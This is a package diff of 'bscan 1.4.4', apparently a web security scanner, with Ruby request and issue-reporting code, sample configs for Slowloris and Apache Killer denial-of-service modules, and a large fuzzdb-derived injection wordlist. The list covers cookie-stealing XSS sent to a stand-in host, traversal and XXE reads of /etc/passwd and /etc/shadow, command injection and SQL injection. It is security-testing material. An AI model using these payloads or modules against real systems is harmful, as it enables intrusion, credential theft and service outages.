bscan 1.4.4

data/lib/bscan/utils/bscan_helper.rb

@@ -0,0 +1,133 @@
+module BscanHelper
+  class Issue
+    attr_accessor :issue_name
+    attr_accessor :url
+    attr_accessor :severity
+    attr_accessor :confidence
+    attr_accessor :issue_background
+    attr_accessor :issue_detail
+    attr_accessor :remediation_background
+    attr_accessor :http_messages
+
+    def initialize(n, u, sev, conf, req, rsp, id='', ib='', rb='')
+    @issue_name,@url,@severity,@confidence,@issue_background,@issue_detail,@remediation_background,@http_messages=
+      n,u,sev,conf,ib,id,rb,[Message.new(req,rsp)]
+    end
+    
+  end
+
+  class Message
+    attr_accessor :req_str
+    attr_accessor :rsp_str
+    def initialize(req, rsp)
+        @req_str,@rsp_str = req,rsp
+    end
+  end
+
+  def prop nm
+      @prop_pref + nm   
+  end
+  
+  def search_path
+      path = []
+      path << File.expand_path('.') << File.expand_path(File.join('.','lib')) << File.expand_path(File.join('~','.bscan')) << File.expand_path(File.join('etc','bscan')) << $:
+  end
+  
+  def search_path_file file
+    Pathname.new(file).absolute? ? [file] : search_path.map! {|p| File.join(p,file)}
+  end
+  
+  def open_in_path file
+    io = nil
+    files = search_path_file(file)
+    files.each do |p|
+        io = File.open(p,"r") if File.file?(p)
+        return io if io
+    end
+    raise "Can't find file in: #{files.join(':')}"
+  end
+
+  def set_len r
+      mbody = r.match(/(\r?\n\r?\n)/)
+      body_pos = mbody.end(0)
+      r.sub!(/content-length\s*:\s*\d+/i, "Content-Length: "+(r.length-body_pos).to_s)
+  end
+
+
+  def do_scan msg, trg, inj
+    @bscan.activity[0]=true
+    @bscan.Log 2, "#{@mid}do_scan Scanning: #{trg}"
+#    msg.url = trg
+    path = $1 if trg =~ /\/\/[^\/]+(\/.*)/
+    path = '/' if (not path) or (path.length < 1)
+    req = msg.req_str.sub(/(GET|POST|)\s*(.+)\s*HTTP/, "\\1 #{path} HTTP")
+    
+    send_req req, msg.getProtocol, inj
+    
+  end 
+  
+  def get_url_host_port req,proto
+    host,port = $1.split(/\s*:\s*/,2) if req =~ /host\s*:\s*([^\s]+)\s*\r?\n/i
+    if not port
+      port = '80' if proto == 'http'
+      port = '443' if proto == 'https'
+    end  
+    path = $2 if req =~/(GET|POST|)\s+(.+)\s+HTTP/
+    ["#{proto}://#{host}:#{port}"+path,host,port.to_i]
+  end
+
+  def send_only req, proto, inj
+     begin
+      trg,host,port = get_url_host_port req,proto
+      https = proto == "https" ? true : false
+      start = Time.now   
+      @bscan.Log 2, "#{@mid}send_req make_req: '#{trg}' '#{host}' '#{port}'\n#{req}"
+      rsp = @bscan.make_request(host, port, https, req)
+      rt = Time.now - start
+      return [rsp,rt,trg,host,port] 
+    rescue Exception => e
+      @bscan.Log 0, "#{@mid}send_req Exception: #{e.message}"
+      @bscan.Log 0, e.backtrace.join("\n")
+    end 
+   end
+
+
+  
+  def send_req req, proto, inj
+      rsp,rt,trg,host,port = send_only req, proto, inj
+      https = proto == "https" ? true : false
+      if not @bscan.modules_only
+        @bscan.Log 2, "#{@mid}send_req do_passive: '#{trg}' '#{host}' '#{port}'\n#{req}\n#{rsp}"
+        @bscan.do_passive_scan(host, port, https, req, rsp) 
+      end
+      verify_response trg, req, rsp, inj, rt
+  end
+  
+  def esc exp
+    Regexp.escape exp
+  end
+  
+  def verify_response u, req, rsp, inj, time
+   
+   @bscan.Log 2, "#{@mid}verify_response: #{u} #{inj} #{time} #{req} #{rsp}"
+
+    st = $1 if rsp =~ /^\s*HTTP.*\s+(\d+)\s+/
+    st ||= '0'
+    st = st.to_i
+    issue = nil
+    if (st >= 500 and @config[prop('check_status')]=='true')
+      issue = Issue.new "#{@mid.chop}: Unexpected Error", u, "Medium", "Retest", req, rsp
+    end
+    mt = @config[prop('check_rsp_max_time')]
+    mt = mt.to_i if mt
+    if (mt and mt > 0 and time > mt)
+      issue = Issue.new "#{@mid.chop}: Long Response Time", u, "Medium", "Retest", req, rsp, "Response time is longer that #{mt}"
+    end
+    if (rsp =~ /#{esc(inj)}/  and @config[prop('check_replay')]=='true')
+      issue = Issue.new "#{@mid.chop}: Possible XSS", u, "High", "Retest", req, rsp, "The following input has been replayed in a response #{inj}"
+    end
+    
+    @bscan.write_issue_state issue if issue
+  end
+  
+end

data/release_notes.txt

@@ -0,0 +1,25 @@
+== 1.4.4
+* Added a module for apache killer (apache_killer.rb)
+* Changed logging to use Java IO (Ruby's IO caused Java exceptions)
+
+== 1.4.3
+* Added a module for Slowloris attacks (slowloris.rb)
+* Updated rdocs
+* Added test.sh for local testing (run it from the prj root)
+
+== 1.4.2
+* Changed docs a bit and git repo location: ssh://gryb_info@git.code.sf.net/p/b-scan/trunk
+
+== 1.4.1
+* Added an important '--help config' option
+
+== 1.4.0
+
+* A version is released!
+
+* headless-bscan.sh - headless launcher example
+* bscan - executable used by headless-bscan.sh
+* bscan.rb - BScan main class
+* injector.rb - external module that injects malicious patterns (e.g. form fuzzdb) 
+  to URL params and body 
+* many_threads.rb - external module that rpeats a request from multiple threads

data/samples/config/big_request.txt

@@ -0,0 +1,12 @@
+POST /?q=something HTTP/1.1^M
+Host: target.one.com:80^M
+Accept: */*^M
+Accept-Language: en^M
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)^M
+Connection: close^M
+Referer: http://asol.selfip.com/p^M
+Content-Type: application/x-www-form-urlencoded^M
+Content-Length: 14^M
+Cookie: JSESSIONID=583A7E5D1FE791D694BBAA1ACC10EBB8^M
+^M
+foo=^^^null^^^10

data/samples/config/conf

@@ -0,0 +1,58 @@
+# BScan settings
+bscan.inactivity_to=300
+bscan.issues=issues
+bscan.modules_only=true
+#bscan.modules=bscan/modules/injector.rb:one,bscan/modules/injector.rb:two,bscan/modules/injector.rb:three,bscan/modules/many_threads.rb
+bscan.modules=bscan/modules/slowloris.rb
+bscan.url=http://target.one.com/path/?param=val
+bscan.url=http://target.two.com/path/?param=val
+
+#KillApache settings
+bscan.kill_apache.hostport=target.one.com:443
+bscan.kill_apache.protocol=https
+bscan.kill_apache.threads=500
+bscan.kill_apache.response_time_factor=5
+bscan.kill_apache.req_per_thread=1
+bscan.kill_apache.read_timeout=10
+bscan.kill_apache.range_nbr=500
+bscan.kill_apache.static_request=true
+
+
+
+#Slowloris settings: port is mandatory in 'hostport' param
+bscan.slowloris.hostport=target.three.com:443
+bscan.slowloris.protocol=https
+bscan.slowloris.method=POST
+bscan.slowloris.threads=25
+bscan.slowloris.response_time_factor=5
+bscan.slowloris.sleep_time=200
+bscan.slowloris.con_nbr_per_thread=50
+bscan.slowloris.pack_per_con=10
+bscan.slowloris.static_request=true
+
+
+# Injector settings
+bscan.injector.one.file=samples/config/injector.txt
+bscan.injector.one.inject_to_body=true
+bscan.injector.one.check_rsp_max_time=1
+bscan.injector.one.check_status=true
+bscan.injector.one.check_replay=true
+bscan.injector.two.file=samples/config/injector.txt
+bscan.injector.two.rsp_max_time=2
+bscan.injector.three.file=samples/config/injector.txt
+bscan.injector.three.inject_to_body=true
+bscan.injector.three.inject_instead_of=^^^:samples/config/request.txt:http
+bscan.injector.three.static_request=true
+bscan.injector.three.check_replay=true
+
+# Many threads settings
+bscan.many_threads.request=samples/config/big_request.txt:http:^^^
+bscan.many_threads.threads=7
+bscan.injector.two.rsp_max_time=2
+bscan.many_threads.static_request=true
+
+# Burp settings
+scanner.testSQLinjectionboolean=true
+scanner.numthreads=10
+proxy.interceptrequests=false
+intruder.numattackthreads=10

data/samples/config/injector.txt

@@ -0,0 +1,514 @@
+<xss_check>
+# All injections below are taken from Google's fuzzdb: http://code.google.com/p/fuzzdb/
+!
+!'
+!@#$%%^#$%#$@#$%$$@#$%^^**(()
+!@#0%^#0##018387@#0^^**(()
+"
+" or "a"="a
+" or "x"="x
+" or 0=0 #
+" or 0=0 --
+" or 1=1 or ""="
+" or 1=1--
+"' or 1 --'"
+") or ("a"="a
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
+"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
+"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
+"><script>"
+"><script>alert(1)</script>
+"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
+">xxx<P>yyy
+"\t"
+#
+#&apos;
+#'
+#xA
+#xA#xD
+#xD
+#xD#xA
+$NULL
+$null
+%
+%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
+%00
+%00../../../../../../etc/passwd
+%00../../../../../../etc/shadow
+%00/
+%00/etc/passwd%00
+%01%02%03%04%0a%0d%0aADSF
+%08x
+%0A/usr/bin/id
+%0A/usr/bin/id%0A
+%0Aid
+%0Aid%0A
+%0a ping -i 30 127.0.0.1 %0a
+%oa ping -n 30 127.0.0.1 %0a
+%0a id %0a
+%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
+%0d
+%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
+%0d%0aX-Injection-Header:%20AttackValue
+%20
+%20$(sleep%2050)
+%20'sleep%2050'
+%20d
+%20n
+%20s
+%20x
+%20|
+%21
+%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
+%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini
+%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00
+%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
+%2500
+%250a
+%26
+%27%20or%201=1
+%28
+%29
+%2A
+%2A%28%7C%28mail%3D%2A%29%29
+%2A%28%7C%28objectclass%3D%2A%29%29
+%2A%7C
+%2C
+%2e%2e%2f
+%3C
+%3C%3F
+%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
+%3cscript%3ealert("XSS");%3c/script%3e
+%3cscript%3ealert(document.cookie);%3c%2fscript%3e
+%5C
+%5C/
+%60
+%7C
+%7f
+%99999999999s
+%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
+%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
+%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
+%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
+%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
+%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
+%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d 
+%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
+%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
+%ff
+%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
+%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
+%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
+%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
+%s%p%x%d
+%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
+%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
+%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
+&
+& id
+& ping -i 30 127.0.0.1 &
+& ping -n 30 127.0.0.1 &
+&#0000060
+&#0000060;
+&#000060
+&#000060;
+&#00060
+&#00060;
+&#0060
+&#0060;
+&#060
+&#060;
+&#10;
+&#10;&#13;
+&#13;
+&#13;&#10;
+&#60
+&#60;
+&#X000003C
+&#X000003C;
+&#X000003c
+&#X000003c;
+&#X00003C
+&#X00003C;
+&#X00003c
+&#X00003c;
+&#X0003C
+&#X0003C;
+&#X0003c
+&#X0003c;
+&#X003C
+&#X003C;
+&#X003c
+&#X003c;
+&#X03C
+&#X03C;
+&#X03c
+&#X03c;
+&#X3C
+&#X3C;
+&#X3c
+&#X3c;
+&#x000003C
+&#x000003C;
+&#x000003c
+&#x000003c;
+&#x00003C
+&#x00003C;
+&#x00003c
+&#x00003c;
+&#x0003C
+&#x0003C;
+&#x0003c
+&#x0003c;
+&#x003C
+&#x003C;
+&#x003c
+&#x003c;
+&#x03C
+&#x03C;
+&#x03c
+&#x03c;
+&#x3C
+&#x3C;
+&#x3c
+&#x3c;
+&LT
+&LT;
+&apos;
+&apos;%20OR
+&id
+&lt
+&lt;
+&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
+&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
+&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
+&lt;&gt;&quot;'%;)(&amp;+
+&ltscript&gtalert(document.cookie);&ltscript&gtalert
+&ltscript&gtalert(document.cookie);</script>
+&quot;;id&quot;
+'
+' (select top 1
+' --
+' ;
+' UNION ALL SELECT
+' UNION SELECT
+' or ''='
+' or '1'='1
+' or '1'='1'--
+' or 'x'='x
+' or (EXISTS)
+' or 0=0 #
+' or 0=0 --
+' or 1 in (@@version)--
+' or 1=1 or ''='
+' or 1=1--
+' or a=a--
+' or uid like '%
+' or uname like '%
+' or user like '%
+' or userid like '%
+' or username like '%
+'%20or%201=1
+'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
+'';!--"<XSS>=&{()}
+') or ('a'='a
+'--
+'; exec master..xp_cmdshell
+'; exec xp_regread
+'; waitfor delay '0:30:0'--
+';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
+';shutdown--
+'><script>alert(document.cookie);</script>
+'><script>alert(document.cookie)</script>
+'hi' or 'x'='x';
+'or select *
+'sqlattempt1
+'||UTL_HTTP.REQUEST
+'||Utl_Http.request('http://<yourservername>') from dual--
+(
+(')
+(sqlattempt2)
+)
+))))))))))
+*
+*&apos;
+*'
+*(|(mail=*))
+*(|(objectclass=*))
+*/*
+*|
++
++%00
+,@variable
+-
+--
+--';
+--sp_password
+-1
+-1.0
+-2
+-20
+-268435455
+..%%35%63
+..%%35c
+..%25%35%63
+..%255c
+..%5c
+..%bg%qf
+..%c0%af
+..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
+..%u2215
+..%u2216
+../
+../../../../../../../../../../../../etc/hosts
+../../../../../../../../../../../../etc/hosts%00
+../../../../../../../../../../../../etc/passwd
+../../../../../../../../../../../../etc/passwd%00
+../../../../../../../../../../../../etc/shadow
+../../../../../../../../../../../../etc/shadow%00
+..\
+..\..\..\..\..\..\..\..\..\..\etc\passwd
+..\..\..\..\..\..\..\..\..\..\etc\passwd%00
+..\..\..\..\..\..\..\..\..\..\etc\shadow
+..\..\..\..\..\..\..\..\..\..\etc\shadow%00
+.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
+.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
+/
+/%00/
+/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
+/%2A
+/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
+/&apos;
+/'
+/,%ENV,/
+/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
+/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
+/.../.../.../.../.../
+/../../../../../../../../%2A
+/../../../../../../../../../../../etc/passwd%00.html
+/../../../../../../../../../../../etc/passwd%00.jpg
+/../../../../../../../../../../etc/passwd
+/../../../../../../../../../../etc/passwd^^
+/../../../../../../../../../../etc/shadow
+/../../../../../../../../../../etc/shadow^^
+/../../../../../../../../bin/id|
+/..\../..\../..\../..\../..\../..\../boot.ini
+/..\../..\../..\../..\../..\../..\../etc/passwd
+/..\../..\../..\../..\../..\../..\../etc/shadow
+/./././././././././././etc/passwd
+/./././././././././././etc/shadow
+//
+//*
+/etc/passwd
+/etc/shadow
+/index.html|id|
+0
+0 or 1=1
+00
+0xfffffff
+1
+1 or 1 in (@@version)--
+1 or 1=1--
+1.0
+1; waitfor delay '0:30:0'--
+1;SELECT%20*
+1||Utl_Http.request('http://<yourservername>') from dual--
+2
+2147483647
+268435455
+65536
+:response.write 111111
+;
+; ping 127.0.0.1 ;
+;/usr/bin/id\n
+;echo 111111
+;id
+;id;
+;id\n
+;id|
+;ls -la
+;system('/usr/bin/id')
+;system('cat%20/etc/passwd')
+;system('id')
+;|/usr/bin/id|
+<
+<  script > < / script>
+<!
+<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
+<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
+</foo>
+<<
+<<<
+<<script>alert("XSS");//<</script>
+<>"'%;)(&+
+<?
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
+<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
+<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
+<IMG DYNSRC="javascript:alert('XSS')">
+<IMG LOWSRC="javascript:alert('XSS')">
+<IMG SRC=" &#14;  javascript:alert('XSS');">
+<IMG SRC="jav	ascript:alert('XSS');">
+<IMG SRC="jav&#x09;ascript:alert('XSS');">
+<IMG SRC="jav&#x0A;ascript:alert('XSS');">
+<IMG SRC="jav&#x0D;ascript:alert('XSS');">
+<IMG SRC="javascript:alert('XSS')"
+<IMG SRC="javascript:alert('XSS');">
+<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
+<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+<IMG SRC=JaVaScRiPt:alert('XSS')>
+<IMG SRC=`javascript:alert("'XSS'")`>
+<IMG SRC=javascript:alert(&quot;XSS&quot;)>
+<IMG SRC=javascript:alert('XSS')>
+<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
+<IMG%20SRC='javasc	ript:alert(document.cookie)'>
+<IMG%20SRC='javascript:alert(document.cookie)'>
+<foo></foo>
+<name>','')); phpinfo(); exit;/*</name>
+<script>alert("XSS")</script>
+<script>alert(document.cookie)</script>
+<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
+<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+<xss><script>alert('XSS')</script></vulnerable>
+<youremail>%0aBcc:<youremail>
+<youremail>%0aCc:<youremail>
+<youremail>%0d%0aBcc:<youremail>
+<youremail>%0d%0aCc:<youremail>
+=
+='
+=--
+=;
+>
+?x=
+?x="
+?x=>
+?x=|
+@&apos;
+@'
+@*
+@variable
+A
+ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
+FALSE
+NULL
+PRINT
+PRINT @@variable
+TRUE
+XXXXX.%p
+XXXXX`perl -e 'print ".%p" x 80'`
+[&apos;]
+[']
+\
+\";alert('XSS');//
+\"blah
+\&apos;
+\'
+\..\..\..\..\..\..\..\..\..\..\etc\passwd
+\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
+\..\..\..\..\..\..\..\..\..\..\etc\shadow
+\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
+\0
+\00
+\00\00
+\00\00\00
+\0\0
+\0\0\0
+\\
+\\&apos;/bin/cat%20/etc/passwd\\&apos;
+\\&apos;/bin/cat%20/etc/shadow\\&apos;
+\\/
+\\\\*
+\\\\?\\
+\n/bin/ls -al\n
+\n/usr/bin/id;
+\n/usr/bin/id\n
+\n/usr/bin/id|
+\nid;
+\nid\n
+\nid|
+\nnetstat -a%\n
+\t
+\u003C
+\u003c
+\x23
+\x27
+\x27UNION SELECT
+\x27\x4F\x52 SELECT *
+\x27\x6F\x72 SELECT *
+\x3C
+\x3D \x27
+\x3D \x3B'
+\x3c
+^&apos;
+^'
+`
+`/usr/bin/id`
+`dir`
+`id`
+`perl -e 'print ".%p" x 80'`%n
+`ping 127.0.0.1`
+a);/usr/bin/id
+a);/usr/bin/id;
+a);/usr/bin/id|
+a);id
+a);id;
+a);id|
+a)|/usr/bin/id
+a)|/usr/bin/id;
+a)|id
+a)|id;
+a;/usr/bin/id
+a;/usr/bin/id;
+a;/usr/bin/id|
+a;id
+a;id;
+a;id|
+http://<yourservername>/
+id%00
+id%00|
+insert
+like
+limit
+null
+or
+or 0=0 #
+or 0=0 --
+or 1=1--
+or%201=1
+or%201=1 --
+response.write 111111
+something%00html
+update
+x' or 1=1 or 'x'='y
+x' or name()='username' or 'x'='y
+xsstest
+xsstest%00"<>'
+{&apos;}
+|/usr/bin/id
+|/usr/bin/id|
+|id
+|id;
+|id|
+|ls
+|ls -la
+|nid\n
+|usr/bin/id\n
+||
+|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
+||/usr/bin/id;
+||/usr/bin/id|
+}
+